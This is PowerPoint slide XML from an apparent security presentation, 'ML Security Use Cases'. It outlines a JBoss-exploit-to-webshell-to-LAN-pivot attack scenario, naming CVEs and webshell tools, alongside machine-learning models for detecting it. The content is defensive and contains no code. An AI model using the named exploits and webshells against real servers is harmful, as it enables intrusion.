          <a:lstStyle/>
          <a:p>
            <a:fld id="{4821D795-FE12-2247-BAA5-F1F065BE8D34}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269282" y="1454219"/>
            <a:ext cx="8605435" cy="3405797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Shades of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Grey</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>The layered security approach fuses multiple pieces of evidence together using a combination of models rules and statistics to move past the traditional detection solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Sequencing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Security Behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOC’s and intelligence along with the fusion of ML models to build a central nervous system view of all possible risks in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Evidence Fusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Overlay risk categories on top of each system in the environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Defense Science Board"/>
              </a:rPr>
              <a:t>Defense Science Board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Resilient Military Systems and the Advanced Cyber Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> (Jan. 2013)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"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8545" r="16508"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792116" y="4046220"/>
            <a:ext cx="5422605" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1363775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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507937" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="235635"/>
            <a:ext cx="9143999" cy="471268"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML Security Use Cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exploit chain model analyzes new traffic for 0-days and deliveries of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>malicious payload (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>jzadeh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/Aktaion)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412954" y="1231490"/>
            <a:ext cx="3910953" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Case: Webshell on DMZ Asset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1231490"/>
            <a:ext cx="3111910" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ML Evidence Fusion </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191632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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507937" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Attacker uploads lightweight </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> on compromised server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jbossinvoker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>zecmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="235635"/>
            <a:ext cx="9143999" cy="471268"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML Security Use Cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jzadeh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Aktaion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412954" y="1231490"/>
            <a:ext cx="3910953" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Case: Webshell on DMZ Asset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1231490"/>
            <a:ext cx="3111910" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ML Evidence Fusion </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402899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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507937" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Attacker uploads lightweight </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> on compromised server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jbossinvoker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>zecmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Beachhead established and trust relationship exploited from DMZ to LAN asset using in memory malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="235635"/>
            <a:ext cx="9143999" cy="471268"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML Security Use Cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jzadeh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Aktaion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412954" y="1231490"/>
            <a:ext cx="3910953" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
